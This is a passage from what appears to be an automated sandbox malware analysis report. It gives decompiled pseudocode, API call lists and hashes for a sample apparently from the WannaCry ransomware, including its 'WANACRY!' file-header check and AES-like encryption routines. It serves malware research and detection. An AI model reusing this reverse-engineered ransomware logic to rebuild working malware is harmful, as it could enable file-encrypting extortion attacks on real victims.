                                                          						do {
                                                          							_t322 = _a12;
                                                          							if(_t322 > 0) {
                                                          								memset(_t281, 0, _t322 << 2);
                                                          								_t354 = _t354 + 0xc;
                                                          							}
                                                          							_t326 = _t326 + 1;
                                                          							_t281 = _t281 + 0x20;
                                                          						} while (_t326 <=  *((intOrPtr*)(_t352 + 0x410)));
                                                          						goto L23;
                                                          					}
                                                          					 *((intOrPtr*)(_t352 + 0x410)) = 0xe;
                                                          					goto L18;
                                                          				}
                                                          			}

















































                                                          0x00402a83
                                                          0x00402a85
                                                          0x00402a8e
                                                          0x00402a95
                                                          0x00402a9e
                                                          0x00402aa3
                                                          0x00402aa4
                                                          0x00402aa4
                                                          0x00402aa9
                                                          0x00402aae
                                                          0x00402ab1
                                                          0x00402ab4
                                                          0x00402ac2
                                                          0x00402ac6
                                                          0x00402acd
                                                          0x00402ad6
                                                          0x00402adb
                                                          0x00402adc
                                                          0x00402adc
                                                          0x00402ae1
                                                          0x00402ae6
                                                          0x00402af4
                                                          0x00402af8
                                                          0x00402aff
                                                          0x00402b05
                                                          0x00402b08
                                                          0x00402b0d
                                                          0x00402b0e
                                                          0x00402b0e
                                                          0x00402b14
                                                          0x00402b23
                                                          0x00402b2a
                                                          0x00402b3f
                                                          0x00402b44
                                                          0x00402b4a
                                                          0x00402b4f
                                                          0x00402b75
                                                          0x00402b7d
                                                          0x00402b92
                                                          0x00402b7f
                                                          0x00402b81
                                                          0x00402b81
                                                          0x00000000
                                                          0x00402b51
                                                          0x00402b53
                                                          0x00402b70
                                                          0x00402b94
                                                          0x00402b94
                                                          0x00402b9a
                                                          0x00402ba2
                                                          0x00402ba3
                                                          0x00402ba6
                                                          0x00402bae
                                                          0x00402bb1
                                                          0x00402bcf
                                                          0x00402bcf
                                                          0x00402bd7
                                                          0x00402bf8
                                                          0x00402c00
                                                          0x00402c01
                                                          0x00402c0b
                                                          0x00402c0e
                                                          0x00402c12
                                                          0x00402c15
                                                          0x00402c17
                                                          0x00402c1f
                                                          0x00402c22
                                                          0x00402c4e
                                                          0x00402c4e
                                                          0x00402c54
                                                          0x00402ca5
                                                          0x00402ca8
                                                          0x00402e04
                                                          0x00402e06
                                                          0x00402e0d
                                                          0x00402e10
                                                          0x00402e73
                                                          0x00402e73
                                                          0x00402e7b
                                                          0x00402e7b
                                                          0x00402e18
                                                          0x00402e1b
                                                          0x00402e1b
                                                          0x00402e20
                                                          0x00000000
                                                          0x00000000
                                                          0x00402e22
                                                          0x00402e25
                                                          0x00402e25
                                                          0x00402e29
                                                          0x00402e59
                                                          0x00402e5b
                                                          0x00402e5e
                                                          0x00402e5e
                                                          0x00402e61
                                                          0x00402e61
                                                          0x00402e64
                                                          0x00402e68
                                                          0x00402e6b
                                                          0x00000000
                                                          0x00402e1b
                                                          0x00402cae
                                                          0x00402cb5
                                                          0x00402cb5
                                                          0x00402cbf
                                                          0x00402d05
                                                          0x00402d0b
                                                          0x00402d11
                                                          0x00402d34
                                                          0x00402d3a
                                                          0x00402d3b
                                                          0x00402d3e
                                                          0x00402d40
                                                          0x00402d43
                                                          0x00402d43
                                                          0x00402d46
                                                          0x00402d4e
                                                          0x00402d8f
                                                          0x00402d95
                                                          0x00402d9b
                                                          0x00402d9c
                                                          0x00402d9f
                                                          0x00402da1
                                                          0x00402da4
                                                          0x00402da4
                                                          0x00402da7
                                                          0x00402da7
                                                          0x00402dad
                                                          0x00000000
                                                          0x00000000
                                                          0x00402daf
                                                          0x00402db5
                                                          0x00402dbf
                                                          0x00402dc3
                                                          0x00402dc8
                                                          0x00402dc9
                                                          0x00402dcf
                                                          0x00402ddb
                                                          0x00402dde
                                                          0x00402de4
                                                          0x00402de6
                                                          0x00402de9
                                                          0x00402dec
                                                          0x00402df3
                                                          0x00402df9
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402df9
                                                          0x00000000
                                                          0x00402db5
                                                          0x00402d16
                                                          0x00000000
                                                          0x00000000
                                                          0x00402d1c
                                                          0x00402d22
                                                          0x00402d25
                                                          0x00402d28
                                                          0x00402d2a
                                                          0x00402d2d
                                                          0x00402d2d
                                                          0x00000000
                                                          0x00402dfb
                                                          0x00402dfb
                                                          0x00000000
                                                          0x00402cb5
                                                          0x00402c56
                                                          0x00402c5c
                                                          0x00402c6a
                                                          0x00402c6e
                                                          0x00402c74
                                                          0x00402c75
                                                          0x00402c7e
                                                          0x00402c8b
                                                          0x00402c91
                                                          0x00402c93
                                                          0x00402c96
                                                          0x00402c9d
                                                          0x00402ca3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402ca3
                                                          0x00000000
                                                          0x00402c5c
                                                          0x00402c24
                                                          0x00402c27
                                                          0x00402c2d
                                                          0x00402c2e
                                                          0x00402c36
                                                          0x00402c3f
                                                          0x00402c43
                                                          0x00402c45
                                                          0x00402c46
                                                          0x00402c49
                                                          0x00402c49
                                                          0x00402c49
                                                          0x00000000
                                                          0x00402c27
                                                          0x00402bd9
                                                          0x00402bdf
                                                          0x00402bdf
                                                          0x00402be4
                                                          0x00402bea
                                                          0x00402bea
                                                          0x00402bea
                                                          0x00402bec
                                                          0x00402bed
                                                          0x00402bf0
                                                          0x00000000
                                                          0x00402bdf
                                                          0x00402bb3
                                                          0x00402bb6
                                                          0x00402bb6
                                                          0x00402bbb
                                                          0x00402bc1
                                                          0x00402bc1
                                                          0x00402bc1
                                                          0x00402bc3
                                                          0x00402bc4
                                                          0x00402bc7
                                                          0x00000000
                                                          0x00402bb6
                                                          0x00402b55
                                                          0x00000000
                                                          0x00402b55

                                                          APIs
                                                          • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402A95
                                                          • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402AA4
                                                          • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402ACD
                                                          • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402ADC
                                                          • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402AFF
                                                          • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402B0E
                                                          • memcpy.MSVCRT(?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B2A
                                                          • memcpy.MSVCRT(?,?,?,?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B3F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ??0exception@@ExceptionThrow$memcpy
                                                          • String ID:
                                                          • API String ID: 1881450474-3916222277
                                                          • Opcode ID: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                                                          • Instruction ID: fcfef073648f46ce18afaeffe4143d5033c2e410e09e17396796de68d512254b
                                                          • Opcode Fuzzy Hash: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                                                          • Instruction Fuzzy Hash: 8DD1C3706006099FDB28CF29C5846EA77F5FF48314F14C43EE95AEB281D778AA85CB58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040150D
                                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00401529
                                                          • memcmp.MSVCRT(?,WANACRY!,00000008), ref: 00401572
                                                          • GlobalAlloc.KERNEL32(00000000,?,?,?,00000010,?,?,?,?), ref: 0040166D
                                                          • _local_unwind2.MSVCRT(?,000000FF), ref: 004016D6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$AllocCreateGlobalSize_local_unwind2memcmp
                                                          • String ID: WANACRY!
                                                          • API String ID: 283026544-1240840912
                                                          • Opcode ID: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                                                          • Instruction ID: 23909f9b909e50c20e483d6bc4be6e23e355ec3bf8b0a6de4718622c8bde6caa
                                                          • Opcode Fuzzy Hash: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                                                          • Instruction Fuzzy Hash: 6E512C71900209ABDB219F95CD84FEEB7BCEB08790F1444BAF515F21A0D739AA45CB28
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 55%
                                                          			E0040350F(void* __ecx, signed int _a4, signed char* _a8) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				signed char _v16;
                                                          				signed int _v20;
                                                          				intOrPtr _v24;
                                                          				char _v28;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				intOrPtr _v40;
                                                          				signed int _v44;
                                                          				char _v56;
                                                          				signed int _t150;
                                                          				signed int _t151;
                                                          				signed int _t155;
                                                          				signed int* _t157;
                                                          				signed char _t158;
                                                          				intOrPtr _t219;
                                                          				signed int _t230;
                                                          				signed char* _t236;
                                                          				signed char* _t237;
                                                          				signed char* _t238;
                                                          				signed char* _t239;
                                                          				signed int* _t240;
                                                          				signed char* _t242;
                                                          				signed char* _t243;
                                                          				signed char* _t245;
                                                          				signed int _t260;
                                                          				signed int* _t273;
                                                          				signed int _t274;
                                                          				void* _t275;
                                                          				void* _t276;
                                                          
                                                          				_t275 = __ecx;
                                                          				if( *((char*)(__ecx + 4)) == 0) {
                                                          					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
                                                          					_push(0x40d570);
                                                          					_push( &_v56);
                                                          					L0040776E();
                                                          				}
                                                          				_t150 =  *(_t275 + 0x3cc);
                                                          				if(_t150 == 0x10) {
                                                          					return E00402E7E(_t275, _a4, _a8);
                                                          				}
                                                          				asm("cdq");
                                                          				_t230 = 4;
                                                          				_t151 = _t150 / _t230;
                                                          				_t274 = _t151;
                                                          				asm("sbb eax, eax");
                                                          				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
                                                          				_v28 =  *((intOrPtr*)(_t155 + 0x40bc24));
                                                          				_v24 =  *((intOrPtr*)(_t155 + 0x40bc2c));
                                                          				_v32 =  *((intOrPtr*)(_t155 + 0x40bc34));
                                                          				_t157 = _t275 + 0x454;
                                                          				if(_t274 > 0) {
                                                          					_v16 = _t274;
                                                          					_v8 = _t275 + 8;
                                                          					_t242 = _a4;
                                                          					do {
                                                          						_t243 =  &(_t242[1]);
                                                          						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
                                                          						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
                                                          						_t245 =  &(_t243[2]);
                                                          						_t273 = _t157;
                                                          						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
                                                          						_v8 = _v8 + 4;
                                                          						_t242 =  &(_t245[1]);
                                                          						_t157 =  &(_t157[1]);
                                                          						 *_t273 =  *_t273 ^  *_v8;
                                                          						_t27 =  &_v16;
                                                          						 *_t27 = _v16 - 1;
                                                          					} while ( *_t27 != 0);
                                                          				}
                                                          				_t158 = 1;
                                                          				_v16 = _t158;
                                                          				if( *(_t275 + 0x410) > _t158) {
                                                          					_v12 = _t275 + 0x28;
                                                          					do {
                                                          						if(_t274 > 0) {
                                                          							_t34 =  &_v28; // 0x403b51
                                                          							_t260 =  *_t34;
                                                          							_v8 = _v12;
                                                          							_a4 = _t260;
                                                          							_v36 = _v24 - _t260;
                                                          							_t240 = _t275 + 0x434;
                                                          							_v40 = _v32 - _t260;
                                                          							_v20 = _t274;
                                                          							do {
                                                          								asm("cdq");
                                                          								_v44 = 0;
                                                          								asm("cdq");
                                                          								asm("cdq");
                                                          								_v8 = _v8 + 4;
                                                          								 *_t240 =  *(0x4093fc + _v44 * 4) ^  *(0x4097fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00408FFC ^  *0x00408BFC ^  *_v8;
                                                          								_t240 =  &(_t240[1]);
                                                          								_a4 = _a4 + 1;
                                                          								_t84 =  &_v20;
                                                          								 *_t84 = _v20 - 1;
                                                          							} while ( *_t84 != 0);
                                                          						}
                                                          						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
                                                          						_v12 = _v12 + 0x20;
                                                          						_t276 = _t276 + 0xc;
                                                          						_v16 = _v16 + 1;
                                                          						_t158 = _v16;
                                                          					} while (_t158 <  *(_t275 + 0x410));
                                                          				}
                                                          				_v8 = _v8 & 0x00000000;
                                                          				if(_t274 > 0) {
                                                          					_t236 = _a8;
                                                          					_t219 = _v24;
                                                          					_a8 = _t275 + 0x454;
                                                          					_t100 =  &_v28; // 0x403b51
                                                          					_v44 =  *_t100 - _t219;
                                                          					_v40 = _v32 - _t219;
                                                          					do {
                                                          						_a8 =  &(_a8[4]);
                                                          						_a4 =  *((intOrPtr*)(_t275 + 8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
                                                          						 *_t236 =  *0x004089FC ^ _a4 >> 0x00000018;
                                                          						_t237 =  &(_t236[1]);
                                                          						asm("cdq");
                                                          						 *_t237 =  *0x004089FC ^ _a4 >> 0x00000010;
                                                          						asm("cdq");
                                                          						_t238 =  &(_t237[1]);
                                                          						 *_t238 =  *0x004089FC ^ _a4 >> 0x00000008;
                                                          						_t239 =  &(_t238[1]);
                                                          						asm("cdq");
                                                          						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x4089fc) ^ _a4;
                                                          						 *_t239 = _t158;
                                                          						_t236 =  &(_t239[1]);
                                                          						_v8 = _v8 + 1;
                                                          						_t219 = _t219 + 1;
                                                          					} while (_v8 < _t274);
                                                          				}
                                                          				return _t158;
                                                          			}


































                                                          0x00403517
                                                          0x0040351e
                                                          0x00403528
                                                          0x00403531
                                                          0x00403536
                                                          0x00403537
                                                          0x00403537
                                                          0x0040353c
                                                          0x00403545
                                                          0x00000000
                                                          0x0040354f
                                                          0x0040355b
                                                          0x0040355c
                                                          0x0040355d
                                                          0x0040355f
                                                          0x0040356e
                                                          0x00403572
                                                          0x0040357d
                                                          0x0040358c
                                                          0x0040358f
                                                          0x00403592
                                                          0x00403598
                                                          0x0040359d
                                                          0x004035a0
                                                          0x004035a3
                                                          0x004035a6
                                                          0x004035ac
                                                          0x004035ad
                                                          0x004035b5
                                                          0x004035be
                                                          0x004035bf
                                                          0x004035c4
                                                          0x004035c9
                                                          0x004035cd
                                                          0x004035d0
                                                          0x004035d3
                                                          0x004035d5
                                                          0x004035d5
                                                          0x004035d5
                                                          0x004035a6
                                                          0x004035dc
                                                          0x004035e3
                                                          0x004035e6
                                                          0x004035ef
                                                          0x004035f2
                                                          0x004035f4
                                                          0x004035fd
                                                          0x004035fd
                                                          0x00403600
                                                          0x00403608
                                                          0x0040360b
                                                          0x00403613
                                                          0x00403619
                                                          0x0040361c
                                                          0x0040361f
                                                          0x00403627
                                                          0x0040363a
                                                          0x0040363d
                                                          0x00403660
                                                          0x00403682
                                                          0x00403688
                                                          0x0040368a
                                                          0x0040368d
                                                          0x00403690
                                                          0x00403690
                                                          0x00403690
                                                          0x0040361f
                                                          0x004036a9
                                                          0x004036ae
                                                          0x004036b2
                                                          0x004036b5
                                                          0x004036b8
                                                          0x004036bb
                                                          0x004035f2
                                                          0x004036c7
                                                          0x004036cd
                                                          0x004036d3
                                                          0x004036d6
                                                          0x004036df
                                                          0x004036e2
                                                          0x004036e7
                                                          0x004036ef
                                                          0x004036f2
                                                          0x00403701
                                                          0x00403709
                                                          0x0040371f
                                                          0x00403726
                                                          0x00403727
                                                          0x00403741
                                                          0x00403745
                                                          0x0040374a
                                                          0x00403760
                                                          0x00403767
                                                          0x00403768
                                                          0x0040377d
                                                          0x00403780
                                                          0x00403782
                                                          0x00403783
                                                          0x00403786
                                                          0x00403787
                                                          0x004036f2
                                                          0x00403794

                                                          APIs
                                                          • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403528
                                                          • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403537
                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B51,?,?), ref: 004036A9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ??0exception@@ExceptionThrowmemcpy
                                                          • String ID: $Q;@
                                                          • API String ID: 2382887404-262343263
                                                          • Opcode ID: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                                                          • Instruction ID: bc36c6e363c45e845c5013d3ee32ff29fee655b638a1b5d52e43d816bbd12583
                                                          • Opcode Fuzzy Hash: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                                                          • Instruction Fuzzy Hash: A581C3759002499FCB05CF68C9809EEBBF5EF89308F2484AEE595E7352C234BA45CF58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 54%
                                                          			E00403797(void* __ecx, signed int _a4, signed char* _a8) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				signed char _v16;
                                                          				signed int _v20;
                                                          				intOrPtr _v24;
                                                          				signed int _v28;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				intOrPtr _v40;
                                                          				signed int _v44;
                                                          				char _v56;
                                                          				signed int _t150;
                                                          				signed int _t151;
                                                          				signed int _t155;
                                                          				signed int* _t157;
                                                          				signed char _t158;
                                                          				intOrPtr _t219;
                                                          				signed int _t230;
                                                          				signed char* _t236;
                                                          				signed char* _t237;
                                                          				signed char* _t238;
                                                          				signed char* _t239;
                                                          				signed int* _t240;
                                                          				signed char* _t242;
                                                          				signed char* _t243;
                                                          				signed char* _t245;
                                                          				signed int _t260;
                                                          				signed int* _t273;
                                                          				signed int _t274;
                                                          				void* _t275;
                                                          				void* _t276;
                                                          
                                                          				_t275 = __ecx;
                                                          				if( *((char*)(__ecx + 4)) == 0) {
                                                          					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
                                                          					_push(0x40d570);
                                                          					_push( &_v56);
                                                          					L0040776E();
                                                          				}
                                                          				_t150 =  *(_t275 + 0x3cc);
                                                          				if(_t150 == 0x10) {
                                                          					return E004031BC(_t275, _a4, _a8);
                                                          				}
                                                          				asm("cdq");
                                                          				_t230 = 4;
                                                          				_t151 = _t150 / _t230;
                                                          				_t274 = _t151;
                                                          				asm("sbb eax, eax");
                                                          				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
                                                          				_v28 =  *((intOrPtr*)(_t155 + 0x40bc28));
                                                          				_v24 =  *((intOrPtr*)(_t155 + 0x40bc30));
                                                          				_v32 =  *((intOrPtr*)(_t155 + 0x40bc38));
                                                          				_t157 = _t275 + 0x454;
                                                          				if(_t274 > 0) {
                                                          					_v16 = _t274;
                                                          					_v8 = _t275 + 0x1e8;
                                                          					_t242 = _a4;
                                                          					do {
                                                          						_t243 =  &(_t242[1]);
                                                          						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
                                                          						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
                                                          						_t245 =  &(_t243[2]);
                                                          						_t273 = _t157;
                                                          						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
                                                          						_v8 = _v8 + 4;
                                                          						_t242 =  &(_t245[1]);
                                                          						_t157 =  &(_t157[1]);
                                                          						 *_t273 =  *_t273 ^  *_v8;
                                                          						_t27 =  &_v16;
                                                          						 *_t27 = _v16 - 1;
                                                          					} while ( *_t27 != 0);
                                                          				}
                                                          				_t158 = 1;
                                                          				_v16 = _t158;
                                                          				if( *(_t275 + 0x410) > _t158) {
                                                          					_v12 = _t275 + 0x208;
                                                          					do {
                                                          						if(_t274 > 0) {
                                                          							_t260 = _v28;
                                                          							_v8 = _v12;
                                                          							_a4 = _t260;
                                                          							_v36 = _v24 - _t260;
                                                          							_t240 = _t275 + 0x434;
                                                          							_v40 = _v32 - _t260;
                                                          							_v20 = _t274;
                                                          							do {
                                                          								asm("cdq");
                                                          								_v44 = 0;
                                                          								asm("cdq");
                                                          								asm("cdq");
                                                          								_v8 = _v8 + 4;
                                                          								 *_t240 =  *(0x40a3fc + _v44 * 4) ^  *(0x40a7fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00409FFC ^  *0x00409BFC ^  *_v8;
                                                          								_t240 =  &(_t240[1]);
                                                          								_a4 = _a4 + 1;
                                                          								_t84 =  &_v20;
                                                          								 *_t84 = _v20 - 1;
                                                          							} while ( *_t84 != 0);
                                                          						}
                                                          						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
                                                          						_v12 = _v12 + 0x20;
                                                          						_t276 = _t276 + 0xc;
                                                          						_v16 = _v16 + 1;
                                                          						_t158 = _v16;
                                                          					} while (_t158 <  *(_t275 + 0x410));
                                                          				}
                                                          				_v8 = _v8 & 0x00000000;
                                                          				if(_t274 > 0) {
                                                          					_t236 = _a8;
                                                          					_t219 = _v24;
                                                          					_a8 = _t275 + 0x454;
                                                          					_v44 = _v28 - _t219;
                                                          					_v40 = _v32 - _t219;
                                                          					do {
                                                          						_a8 =  &(_a8[4]);
                                                          						_a4 =  *((intOrPtr*)(_t275 + 0x1e8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
                                                          						 *_t236 =  *0x00408AFC ^ _a4 >> 0x00000018;
                                                          						_t237 =  &(_t236[1]);
                                                          						asm("cdq");
                                                          						 *_t237 =  *0x00408AFC ^ _a4 >> 0x00000010;
                                                          						asm("cdq");
                                                          						_t238 =  &(_t237[1]);
                                                          						 *_t238 =  *0x00408AFC ^ _a4 >> 0x00000008;
                                                          						_t239 =  &(_t238[1]);
                                                          						asm("cdq");
                                                          						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x408afc) ^ _a4;
                                                          						 *_t239 = _t158;
                                                          						_t236 =  &(_t239[1]);
                                                          						_v8 = _v8 + 1;
                                                          						_t219 = _t219 + 1;
                                                          					} while (_v8 < _t274);
                                                          				}
                                                          				return _t158;
                                                          			}


































                                                          0x0040379f
                                                          0x004037a6
                                                          0x004037b0
                                                          0x004037b9
                                                          0x004037be
                                                          0x004037bf
                                                          0x004037bf
                                                          0x004037c4
                                                          0x004037cd
                                                          0x00000000
                                                          0x004037d7
                                                          0x004037e3
                                                          0x004037e4
                                                          0x004037e5
                                                          0x004037e7
                                                          0x004037f6
                                                          0x004037fa
                                                          0x00403805
                                                          0x00403814
                                                          0x00403817
                                                          0x0040381a
                                                          0x00403820
                                                          0x00403828
                                                          0x0040382b
                                                          0x0040382e
                                                          0x00403831
                                                          0x00403837
                                                          0x00403838
                                                          0x00403840
                                                          0x00403849
                                                          0x0040384a
                                                          0x0040384f
                                                          0x00403854
                                                          0x00403858
                                                          0x0040385b
                                                          0x0040385e
                                                          0x00403860
                                                          0x00403860
                                                          0x00403860
                                                          0x00403831
                                                          0x00403867
                                                          0x0040386e
                                                          0x00403871
                                                          0x0040387d
                                                          0x00403880
                                                          0x00403882
                                                          0x0040388b
                                                          0x0040388e
                                                          0x00403896
                                                          0x00403899
                                                          0x004038a1
                                                          0x004038a7
                                                          0x004038aa
                                                          0x004038ad
                                                          0x004038b5
                                                          0x004038c8
                                                          0x004038cb
                                                          0x004038ee
                                                          0x00403910
                                                          0x00403916
                                                          0x00403918
                                                          0x0040391b
                                                          0x0040391e
                                                          0x0040391e
                                                          0x0040391e
                                                          0x004038ad
                                                          0x00403937
                                                          0x0040393c
                                                          0x00403940
                                                          0x00403943
                                                          0x00403946
                                                          0x00403949
                                                          0x00403880
                                                          0x00403955
                                                          0x0040395b
                                                          0x00403961
                                                          0x00403964
                                                          0x0040396d
                                                          0x00403975
                                                          0x0040397d
                                                          0x00403980
                                                          0x0040398f
                                                          0x0040399a
                                                          0x004039b0
                                                          0x004039b7
                                                          0x004039b8
                                                          0x004039d2
                                                          0x004039d6
                                                          0x004039db
                                                          0x004039f1
                                                          0x004039f8
                                                          0x004039f9
                                                          0x00403a0e
                                                          0x00403a11
                                                          0x00403a13
                                                          0x00403a14
                                                          0x00403a17
                                                          0x00403a18
                                                          0x00403980
                                                          0x00403a25

                                                          APIs
                                                          • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037B0
                                                          • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037BF
                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?), ref: 00403937
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ??0exception@@ExceptionThrowmemcpy
                                                          • String ID:
                                                          • API String ID: 2382887404-3916222277
                                                          • Opcode ID: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
                                                          • Instruction ID: 1cfba4d829132d5223a2741c68a06c6b284a50eb41fad236877f379c856cacdf
                                                          • Opcode Fuzzy Hash: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
                                                          • Instruction Fuzzy Hash: B991C375A002499FCB05CF69C480AEEBBF5FF89315F2480AEE595E7342C234AA45CF58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004029CC(void* _a4) {
                                                          				void* _t17;
                                                          				intOrPtr _t18;
                                                          				intOrPtr _t23;
                                                          				intOrPtr _t25;
                                                          				signed int _t35;
                                                          				void* _t37;
                                                          
                                                          				_t37 = _a4;
                                                          				if(_t37 != 0) {
                                                          					if( *((intOrPtr*)(_t37 + 0x10)) != 0) {
                                                          						_t25 =  *((intOrPtr*)(_t37 + 4));
                                                          						 *((intOrPtr*)( *((intOrPtr*)( *_t37 + 0x28)) + _t25))(_t25, 0, 0);
                                                          					}
                                                          					if( *(_t37 + 8) == 0) {
                                                          						L9:
                                                          						_t18 =  *((intOrPtr*)(_t37 + 4));
                                                          						if(_t18 != 0) {
                                                          							 *((intOrPtr*)(_t37 + 0x20))(_t18, 0, 0x8000,  *((intOrPtr*)(_t37 + 0x30)));
                                                          						}
                                                          						return HeapFree(GetProcessHeap(), 0, _t37);
                                                          					} else {
                                                          						_t35 = 0;
                                                          						if( *((intOrPtr*)(_t37 + 0xc)) <= 0) {
                                                          							L8:
                                                          							free( *(_t37 + 8));
                                                          							goto L9;
                                                          						} else {
                                                          							goto L5;
                                                          						}
                                                          						do {
                                                          							L5:
                                                          							_t23 =  *((intOrPtr*)( *(_t37 + 8) + _t35 * 4));
                                                          							if(_t23 != 0) {
                                                          								 *((intOrPtr*)(_t37 + 0x2c))(_t23,  *((intOrPtr*)(_t37 + 0x30)));
                                                          							}
                                                          							_t35 = _t35 + 1;
